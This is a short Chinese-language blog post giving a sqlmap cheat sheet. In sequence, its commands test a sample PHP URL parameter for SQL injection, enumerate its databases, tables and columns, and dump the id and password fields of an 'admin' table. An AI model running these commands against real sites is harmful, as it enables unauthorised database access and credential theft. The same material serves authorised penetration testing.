SQLMAP用法

检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11

爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –dbs

爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 –current-db

指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 –tables

‘vhost48330’ 为指定数据库名称

指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin –columns
‘admin’ 为指定表名称

指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password –dump
‘ac,id,password’ 为指定字段名称

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关文章

开始在上面输入您的搜索词,然后按回车进行搜索。按ESC取消。

返回顶部